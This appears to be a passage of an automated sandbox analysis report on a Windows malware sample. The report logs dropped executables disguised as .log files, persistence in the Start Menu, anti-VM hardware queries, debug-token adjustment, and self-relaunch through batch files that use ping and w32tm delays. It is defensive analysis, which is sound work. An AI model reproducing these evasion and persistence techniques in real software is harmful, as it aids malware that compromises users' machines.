                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\qmowuovM.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\iWdYRpBW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\TArJFQhB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\kPsHDmnV.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exe TID: 7128Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 2200Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 1292Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 6648Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 5176Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 1100Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 4708Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 3752Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 5332Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 5064Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 4592Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 5564Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 6772Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 4696Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 3408Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 6584Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 5884Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 2668Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe TID: 1216Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\teh76E2k50.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2972062578.000000001B080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2872187878.000000001BB1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK=v
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2827033273.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: w32tm.exe, 0000001F.00000002.2878321824.000002586909A000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3414832117.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3126040623.000000001B590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@[
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2512547472.000000001B5D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                            Source: teh76E2k50.exe, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe1.0.dr, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe.0.drBinary or memory string: HVewE422XTcoAhqEMuk4
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2665987309.000000001B3C4000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000013.00000002.2683866817.0000016BEAA69000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2777547098.000000001BFA7000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000019.00000002.2781574461.00000256551E9000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3132626904.000000001BAB4000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002B.00000002.3109024410.000001D323599000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3159951531.000000000141C000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000031.00000002.3215600945.0000021673EB8000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3277420340.000000000167B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF848C031F2 rdtsc 0_2_00007FF848C031F2
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\teh76E2k50.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\znx0BCuWHE.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8JExSyzmRo.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
